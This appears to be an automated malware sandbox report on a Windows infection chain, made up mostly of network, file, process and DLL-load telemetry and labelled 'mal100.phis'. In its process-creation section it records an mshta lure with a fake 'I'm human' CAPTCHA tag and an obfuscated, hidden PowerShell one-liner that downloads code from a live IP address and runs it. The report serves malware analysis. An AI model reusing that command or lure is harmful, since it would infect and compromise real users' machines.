                Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
                Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
                Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
                Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
                Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
                Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
                Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
                Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
                Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
                Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
                Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49723 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 142.250.64.68:443 -> 192.168.2.17:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.61.69:443 -> 192.168.2.17:49729 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.17:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49754 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.207.52:443 -> 192.168.2.17:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.17:49758 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.204.6.193:443 -> 192.168.2.17:49771 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 134.213.193.62:443 -> 192.168.2.17:49774 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 18.164.96.110:443 -> 192.168.2.17:49777 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.208.240:443 -> 192.168.2.17:49778 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49780 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.17.209.240:443 -> 192.168.2.17:49784 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 13.107.246.40:443 -> 192.168.2.17:49787 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.64.80.1:443 -> 192.168.2.17:50040 version: TLS 1.2
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir5580_533688855
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir5580_533688855
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: classification engineClassification label: mal100.phis.expl.evad.win@33/22@29/137
                Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\5IQBCSP1\rq3xYUErWsFPbHiX[1].htm
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\lUbbhwIMKp
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sex42yrg.b54.ps1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\System32\mshta.exeFile read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,6627453953828994574,1927372697243055533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://roombedsrewiews.com"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1972,i,6627453953828994574,1927372697243055533,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2032 /prefetch:3
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                Source: unknownProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://adult-hub1990.cfd/rq3xYUErWsFPbHiX.html #'' I'm human ID505306''
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "$TV1='ject Net.WebCli';$TV2='loadString(''http://92.255.85.2/a.mp4'')';$TV3='ent).Down';$TV4='(New-Ob';$DP=IEX ($TV4,$TV1,$TV3,$TV2 -Join '')|IEX"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\toaudqqy.cmdline"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES189A.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B1832D39C30407296B9DAA42FAFADD.TMP"
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dll
